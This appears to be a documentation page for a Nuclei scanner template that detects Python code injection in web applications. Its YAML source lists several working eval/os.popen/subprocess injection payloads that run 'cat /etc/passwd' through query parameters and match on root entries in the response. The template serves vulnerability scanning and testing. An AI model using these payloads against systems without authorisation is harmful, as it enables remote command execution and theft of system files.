Skip to content
Nuclei Templates

Python Code Injection

ID: python-code-injection

Severity: high

Author: ritikchaddha

Tags: python,dast,injection,cmdi

Description

Section titled “Description”

YAML Source

Section titled “YAML Source”
id: python-code-injection


info:
  name: Python Code Injection
  author: ritikchaddha
  severity: high
  tags: python,dast,injection,cmdi


variables:
  Command: "cat /etc/passwd"


http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'


    payloads:
      injection:
        - eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
        # without loop, one expression
        - eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
        # without loop, one expression
        - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
        # without compile
        - __import__('os').popen('{{Command}}').read()
        # multiple expressions, separated by commas
        - str("-"*50),__import__('os').popen('{{Command}}').read()
        # multiple statements, separated by semicolons
        - eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
        - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
        # with `for` loop technique, without global __import__ using subprocess.popen
        - eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
        - eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
        - eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))


    fuzzing:
      - part: query
        type: replace
        fuzz:
          - "{{injection}}"


    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
# digest: 490a00463044022064ced5a02135a5ba8b7c175805059e306f3733d3bbf857549147c9c0ccbd384002201c08821cca27e513e75cac1aac095d5b3a88042240da35c639097b520cc3e448:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "dast/vulnerabilities/cmdi/python-code-injection.yaml"

View on Github